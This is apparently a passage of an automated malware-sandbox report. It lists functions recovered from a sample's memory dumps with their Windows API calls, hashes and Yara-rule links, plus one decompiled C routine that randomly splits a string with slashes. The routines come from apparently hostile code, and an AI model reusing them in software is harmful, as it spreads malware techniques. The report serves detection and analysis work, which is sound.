                                                            • Instruction ID: d104dfa2e8303db07159c9a4195923a968856613e992d67947138aa8adf65486
                                                            • Opcode Fuzzy Hash: db2445d62106c11a5fdad0ff894d4e5aa625cb6749a670a48dca797df797fa9e
                                                            • Instruction Fuzzy Hash: FF117CB0600119BBEB20ABA5EC88EAF7E7CFF41754F144128F505E6050D730AA40EAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0458100F, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,73BB8250,73B769A0,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 0458101F
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0457CD48,?,00000000,0456EE2A), ref: 04581041
                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 0458106D
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04581080
                                                              • Part of subcall function 0457435F: strstr.NTDLL ref: 04574437
                                                              • Part of subcall function 0457435F: strstr.NTDLL ref: 0457448A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3712611166-0
                                                            • Opcode ID: 8d4e701b91f06650872650c6ee6dfb1f4fbc855ff6756a91d670fbc3eb084ede
                                                            • Instruction ID: cbe67d0c17c640d7306dfb3795911561893879e6d29250f697f502ad2bba20e3
                                                            • Opcode Fuzzy Hash: 8d4e701b91f06650872650c6ee6dfb1f4fbc855ff6756a91d670fbc3eb084ede
                                                            • Instruction Fuzzy Hash: 0B113A7260111AFFDB11AFA1DC88C9F7BBCFF45255B008029F905A6110DB35EE56ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456FB2B, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(0458B620,0458B7A4,00000402,0458B7A4), ref: 0456FB63
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000,0458B620), ref: 0456FB7A
                                                            • StrChrA.SHLWAPI(00000000,0000002E), ref: 0456FB83
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 0456FBA1
                                                              • Part of subcall function 0457046C: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,0457C495,?,0458B620,0457C495,?,00000000,00000004,0456A09A,?,810C74FC), ref: 04570543
                                                              • Part of subcall function 0457046C: VirtualProtect.KERNELBASE(0458B7A4,00000004,0456A09A,0456A09A,0457C495,?,00000000,00000004,0456A09A,?,810C74FC,00000000,?,04588560,0000001C,04569E36), ref: 0457055E
                                                              • Part of subcall function 0457046C: RtlEnterCriticalSection.NTDLL(0458C300), ref: 04570582
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 105881616-0
                                                            • Opcode ID: 1390003393293429618b5a9f86c0ce38a4b0db8c6a7cbc1761200f5b99f833e1
                                                            • Instruction ID: 846084f6bab1d6fed927e4781bf288a4ebfd0eaef6a44fc16fd056cdc6aca020
                                                            • Opcode Fuzzy Hash: 1390003393293429618b5a9f86c0ce38a4b0db8c6a7cbc1761200f5b99f833e1
                                                            • Instruction Fuzzy Hash: 65217C75A04205EFDB10DF68D958AAEBBF9FF45304F108459E406AB260EB74E940EB10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04572B3F, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 04572B5A
                                                            • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 04572B7E
                                                            • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 04572BD6
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 04572BA7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: QueryValue$AllocateCloseHeapOpen
                                                            • String ID:
                                                            • API String ID: 453107315-0
                                                            • Opcode ID: 6f4068ab22fe95ec16aff789868e157c30e2c7eb253c82e867f227189f62fa7c
                                                            • Instruction ID: 8181f974b0b5744b93f098e877eabb9e31462e0c5dbcd9155d6cf4ad44a7245e
                                                            • Opcode Fuzzy Hash: 6f4068ab22fe95ec16aff789868e157c30e2c7eb253c82e867f227189f62fa7c
                                                            • Instruction Fuzzy Hash: 8021C4B590010DFFDB119F94E880CEEBBBDFF88340F5084A6F805A6111E775AA94EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04573628, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04577E4A,00000000,?,?,045763BE,00000000,049BB188), ref: 04573633
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457364B
                                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04577E4A,00000000,?,?,045763BE,00000000,049BB188), ref: 0457368F
                                                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 045736B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: 1a19199cad46f97b2c7ab4ec0f771d6e2233ba622c5b2480602ff9bcf45f587c
                                                            • Instruction ID: f0f36f31677834c03d14c4fddeb4dbc0c2b026fe6aa8b3f8dec088df70d988d3
                                                            • Opcode Fuzzy Hash: 1a19199cad46f97b2c7ab4ec0f771d6e2233ba622c5b2480602ff9bcf45f587c
                                                            • Instruction Fuzzy Hash: AA11EC72A00215EFD7108F69ECC4D9E7FAEFB91660F150179F505E7250EA74AE04E7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6006, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00DD6006(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xdda290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xdda2a8; // 0x1c044bba
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xdda2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                            0x00dd600e
                                                            0x00dd6011
                                                            0x00dd6017
                                                            0x00dd602f
                                                            0x00dd6033
                                                            0x00dd6036
                                                            0x00dd6038
                                                            0x00dd603b
                                                            0x00dd603d
                                                            0x00dd6040
                                                            0x00dd6042
                                                            0x00dd6042
                                                            0x00dd6044
                                                            0x00dd604f
                                                            0x00dd6054
                                                            0x00dd6065
                                                            0x00dd606d
                                                            0x00dd6072
                                                            0x00dd6075
                                                            0x00dd6078
                                                            0x00dd607a
                                                            0x00dd6080
                                                            0x00dd6083
                                                            0x00dd6083
                                                            0x00dd6083
                                                            0x00dd608e
                                                            0x00dd6093
                                                            0x00dd609d

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DD6410,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD6011
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DD6029
                                                            • memcpy.NTDLL(00000000,039C9630,-00000008,?,?,?,00DD6410,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD606D
                                                            • memcpy.NTDLL(00000001,039C9630,00000001,00DD72E3,00000000,039C9630), ref: 00DD608E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: c69c72c162e257b4e1d904c37419f6f33e9d6985790a7a60e0dc649eebe69428
                                                            • Instruction ID: 08a5b2ada8a7303fb4bf842eff952ad010304b2aea973aec0870676568db635e
                                                            • Opcode Fuzzy Hash: c69c72c162e257b4e1d904c37419f6f33e9d6985790a7a60e0dc649eebe69428
                                                            • Instruction Fuzzy Hash: C111C672A01214BFD7208B6ADC84DAEBFBEEB80760B194167F508D7350E6719E04C7B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04575B83, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,0457EE19,00000000,00000000), ref: 04575BA1
                                                            • GetLastError.KERNEL32(?,00000000,?,0457EE19,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0456C0ED,?,0000001E), ref: 04575BA9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 203985260-0
                                                            • Opcode ID: d8c2a8f4fee79e2cd5e0a2042fb88839fadbfff5663a35f2484adbc416e3a537
                                                            • Instruction ID: 21aabe17eaf92eef2158cf7ff04d063f6fd47b7c1c310e5a802ddc2c4a1b4881
                                                            • Opcode Fuzzy Hash: d8c2a8f4fee79e2cd5e0a2042fb88839fadbfff5663a35f2484adbc416e3a537
                                                            • Instruction Fuzzy Hash: 4001FC71108255FF8330AA266C48C3BBB7CFBC6760F004A2DF866E2180EE216804E671
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581FF0, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000008,?,00000008,00000000,?,?,04568A86,?,?,?,?,?,?,?,?,?), ref: 04582004
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • mbstowcs.NTDLL ref: 0458201E
                                                            • lstrlen.KERNEL32(?,?,00000008), ref: 04582029
                                                            • mbstowcs.NTDLL ref: 04582043
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                                            • String ID:
                                                            • API String ID: 1961997177-0
                                                            • Opcode ID: a3d6fed951447a717fb6c6544775b521a928e9d2ae9520e98ed22e24276a9ba2
                                                            • Instruction ID: d3b7d359efd1041ad8702bd988093ba571d7b7ec84dc6b6772c777a51f040367
                                                            • Opcode Fuzzy Hash: a3d6fed951447a717fb6c6544775b521a928e9d2ae9520e98ed22e24276a9ba2
                                                            • Instruction Fuzzy Hash: 2701B17250030AB7DB217BA59C45F8F7FACFFD4B54F20402DB905A6100EE76E910A7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04577D2E, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04577D41
                                                            • lstrlen.KERNEL32(049BAAC0), ref: 04577D62
                                                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04577D7A
                                                            • lstrcpy.KERNEL32(00000000,049BAAC0), ref: 04577D8C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1929783139-0
                                                            • Opcode ID: 53c951c3ebf76f1785f05825407dbac5c03905b58ae79ab318a83d9462d8770c
                                                            • Instruction ID: 1f99c6881b906394a234881c2c3e42144eb5f52ffc0bfad123c64116a1269e39
                                                            • Opcode Fuzzy Hash: 53c951c3ebf76f1785f05825407dbac5c03905b58ae79ab318a83d9462d8770c
                                                            • Instruction Fuzzy Hash: 53018C75500344FBC7119F99B848E6E7BBCFB49641F144069E90AE3241DA34E908EB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456C3DA, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?), ref: 0456C3E7
                                                            • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0456C40D
                                                            • lstrcpy.KERNEL32(00000014,?), ref: 0456C432
                                                            • memcpy.NTDLL(?,?,?), ref: 0456C43F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 1388643974-0
                                                            • Opcode ID: ac915e3038e2b2082a603dae0171126375451eb5e4b1039ce3d6cf08f3a2acd1
                                                            • Instruction ID: 126f0bca9d9714e88c5e953d296271a2cb3b7dd82f8d0339e4ea64d801bf7673
                                                            • Opcode Fuzzy Hash: ac915e3038e2b2082a603dae0171126375451eb5e4b1039ce3d6cf08f3a2acd1
                                                            • Instruction Fuzzy Hash: 3011467150030AEFCB21CF58D884E9ABBF8FB48715F10846DF99A9B211D775E908EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D464, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • RtlInitializeCriticalSection.NTDLL(0458C300), ref: 0456D488
                                                            • RtlInitializeCriticalSection.NTDLL(0458C2E0), ref: 0456D49E
                                                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0456D4AF
                                                            • GetModuleHandleA.KERNEL32(0000170B), ref: 0456D4E3
                                                              • Part of subcall function 04561401: GetModuleHandleA.KERNEL32(?,00000001,77109EB0,00000000,?,?,?,?,00000000,0456D4C6), ref: 04561419
                                                              • Part of subcall function 04561401: LoadLibraryA.KERNEL32(?), ref: 045614BA
                                                              • Part of subcall function 04561401: FreeLibrary.KERNEL32(00000000), ref: 045614C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                            • String ID:
                                                            • API String ID: 1711133254-0
                                                            • Opcode ID: 4411aab6595d89badf739839771edb7dcd64825b4b0d5b071a60ef101a63b14f
                                                            • Instruction ID: a0833800ad8dac0c322ee092b9ee4bd1c430678c25cbb27a4040eca2dc3ad7b9
                                                            • Opcode Fuzzy Hash: 4411aab6595d89badf739839771edb7dcd64825b4b0d5b071a60ef101a63b14f
                                                            • Instruction Fuzzy Hash: B4116171A002048BD722EFA9B88490977E5F745715700192EE686F3280DFB8AC0CBBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04568BD0, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,0457494D,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 04568BD7
                                                            • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 04568BEF
                                                            • memcpy.NTDLL(0000000C,?,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04568C05
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,7656D3B0,049BB17C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B5D
                                                              • Part of subcall function 04580B38: StrTrimA.SHLWAPI(00000000,0458847C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B7C
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B88
                                                            • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 04568C37
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3208927540-0
                                                            • Opcode ID: 475a7d81fb169f39f73c2d169dd0d28c0a72e9cbfabb053da13d7191c482b12f
                                                            • Instruction ID: 208738c8655c699d65f3379ba182ab1fb9176e8e2e10544cf5e7173b93f0422e
                                                            • Opcode Fuzzy Hash: 475a7d81fb169f39f73c2d169dd0d28c0a72e9cbfabb053da13d7191c482b12f
                                                            • Instruction Fuzzy Hash: 4F01D431602702EBF3216E12EC44F2B7BA8FB80756F004429F616AA180DB64AC4DF760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04571358, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 04571363
                                                            • Sleep.KERNEL32(0000000A,?,?,04573BC6,00000000,?,0458C140), ref: 0457136D
                                                            • SetEvent.KERNEL32(?,?,04573BC6,00000000,?,0458C140), ref: 045713C4
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 045713E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeaveSleep
                                                            • String ID:
                                                            • API String ID: 1925615494-0
                                                            • Opcode ID: 3525d707136458f26a6ce0207cc0656dbc83309d4e851b4e123d1bd03d02ed31
                                                            • Instruction ID: 2817c8d4fd1bfc2135a913410292d9eab95d7244ba8c03115385bbd1d53bc9d2
                                                            • Opcode Fuzzy Hash: 3525d707136458f26a6ce0207cc0656dbc83309d4e851b4e123d1bd03d02ed31
                                                            • Instruction Fuzzy Hash: B8014071640304EBE711ABB4FC85B5A3BA8FB04715F105029F606F61D0DE79AD08BB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04561C52, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04581AD6: lstrlen.KERNEL32(?,?,00000000,04561C68), ref: 04581ADB
                                                              • Part of subcall function 04581AD6: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04581AF0
                                                              • Part of subcall function 04581AD6: wsprintfA.USER32 ref: 04581B0C
                                                              • Part of subcall function 04581AD6: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04581B28
                                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04561C80
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 04561C8F
                                                            • CloseHandle.KERNEL32(00000000), ref: 04561C99
                                                            • GetLastError.KERNEL32 ref: 04561CA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 4042893638-0
                                                            • Opcode ID: 96ab88cbb839397c1c724daa4c8674fedb8fcef6dfd0a4084f1d9ae11b1dd6e6
                                                            • Instruction ID: 6ec143b160829399bbb727734e5826f5facc9fd81a07bfd658848761c6af8545
                                                            • Opcode Fuzzy Hash: 96ab88cbb839397c1c724daa4c8674fedb8fcef6dfd0a4084f1d9ae11b1dd6e6
                                                            • Instruction Fuzzy Hash: 11F0F471201614FBE7212B66ED88FAF7F6CFF417A0F10411AF50AE6080DA34A904B3B4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04578EA8, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 04578EBA
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                              • Part of subcall function 0457533D: GetLastError.KERNEL32 ref: 04575388
                                                              • Part of subcall function 0457533D: WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                              • Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                              • Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                              • Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                              • Part of subcall function 0457533D: CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0456F15D,?,?,00001000,?,?,00001000), ref: 04578EDD
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0456F15D,?,?,00001000,?,?,00001000), ref: 04578EFF
                                                            • GetLastError.KERNEL32(?,0456F15D,?,?,00001000,?,?,00001000), ref: 04578F13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                            • String ID:
                                                            • API String ID: 3370347312-0
                                                            • Opcode ID: 8d01fd5cfba55b573bd17300b725f55e985334df622eaf6ed5082f7801b4080d
                                                            • Instruction ID: ff582cc569dd974517e9bc742664bafcbd810cafb6d50b2f47be94b36d66c317
                                                            • Opcode Fuzzy Hash: 8d01fd5cfba55b573bd17300b725f55e985334df622eaf6ed5082f7801b4080d
                                                            • Instruction Fuzzy Hash: BCF08C31604205BBDB212E60AC0DF9A3A26FB05710F100428F612A90E0EB75B924BF69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04580132, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(0458C000,00000000), ref: 0458013E
                                                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04580159
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04580182
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 045801A3
                                                              • Part of subcall function 045742B4: SetEvent.KERNEL32(?,?,0456E0E1), ref: 045742C9
                                                              • Part of subcall function 045742B4: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0456E0E1), ref: 045742E9
                                                              • Part of subcall function 045742B4: CloseHandle.KERNEL32(00000000,?,0456E0E1), ref: 045742F2
                                                              • Part of subcall function 045742B4: CloseHandle.KERNEL32(?,?,?,0456E0E1), ref: 045742FC
                                                              • Part of subcall function 045742B4: RtlEnterCriticalSection.NTDLL(?), ref: 04574304
                                                              • Part of subcall function 045742B4: RtlLeaveCriticalSection.NTDLL(?), ref: 0457431C
                                                              • Part of subcall function 045742B4: CloseHandle.KERNEL32(?), ref: 04574338
                                                              • Part of subcall function 045742B4: LocalFree.KERNEL32(?), ref: 04574343
                                                              • Part of subcall function 045742B4: RtlDeleteCriticalSection.NTDLL(?), ref: 0457434D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                            • String ID:
                                                            • API String ID: 1103286547-0
                                                            • Opcode ID: 21cc1ed9221eb2f756f7a88edf8ee7ff5406719669b1c28d5afdf0f6cfd59834
                                                            • Instruction ID: cab3bc7014714ce2f7e815f102729f394b1479636c22e0d88b3085e0da8bf3f1
                                                            • Opcode Fuzzy Hash: 21cc1ed9221eb2f756f7a88edf8ee7ff5406719669b1c28d5afdf0f6cfd59834
                                                            • Instruction Fuzzy Hash: F1F0A431740311EBE6312B61EC0DF4A3B59FB85B65F05101CF604BA2C0DD68AC0DFA64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045772A6, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,04579232,000000FF,049BA7F0,?,?,04581784,0000003A,049BA7F0), ref: 045772C2
                                                            • GetLastError.KERNEL32(?,?,04581784,0000003A,049BA7F0,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045772CD
                                                            • WaitNamedPipeA.KERNEL32(00002710), ref: 045772EF
                                                            • WaitForSingleObject.KERNEL32(00000000,?,?,04581784,0000003A,049BA7F0,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD), ref: 045772FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                            • String ID:
                                                            • API String ID: 4211439915-0
                                                            • Opcode ID: 32cf4f6b7cd4d631b987df528f6c017d22aee37b7624943141dfb0567fe06771
                                                            • Instruction ID: a6fb9ca4948ed6391d599c36397a66d9d048d11b6431dfae451cf95f02c526e8
                                                            • Opcode Fuzzy Hash: 32cf4f6b7cd4d631b987df528f6c017d22aee37b7624943141dfb0567fe06771
